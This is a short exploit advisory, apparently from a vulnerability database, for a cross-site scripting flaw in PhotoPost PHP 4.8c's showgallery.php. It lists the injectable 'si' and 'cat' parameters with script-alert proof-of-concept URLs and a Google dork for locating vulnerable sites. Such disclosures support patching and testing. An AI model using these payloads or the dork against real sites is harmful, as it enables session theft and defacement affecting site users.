Lucene search
SecurityvulnsSECURITYVULNS:DOC:25836HistoryMar 03, 2011 - 12:00 a.m.
PhotoPost PHP 4.8c (showgallery.php) Cross Site Scripting
2011-03-0300:00:00
vulners.com
256
##########################################################
Exploit Title: PhotoPost PHP 4.8c (showgallery.php) Cross Site Scripting
home : http://www.D99Y.com
Author: NassRawI
Date: 2/3/2011
Google Dork: "Powered by: PhotoPost PHP 4.8c"
Software Link: http://www.photopost.com/
##########################################################
file :
showgallery.php
exploit :
http://localhost/showgallery.php?si=" [XSS] "
http://localhost/showgallery.php?cat="[XSS]"
http://localhost/showgallery.php?si="<script>alert(12345)</script>"
http://localhost/showgallery.php?cat="<script>alert(12345)</script>"
##########################################################
Greetz :
D99Y Team + alroo7 alte no tkda3 + moot almsh3er + mahmoudvip + Difficult 511
and all members D99Y.CoM
Enjoy :)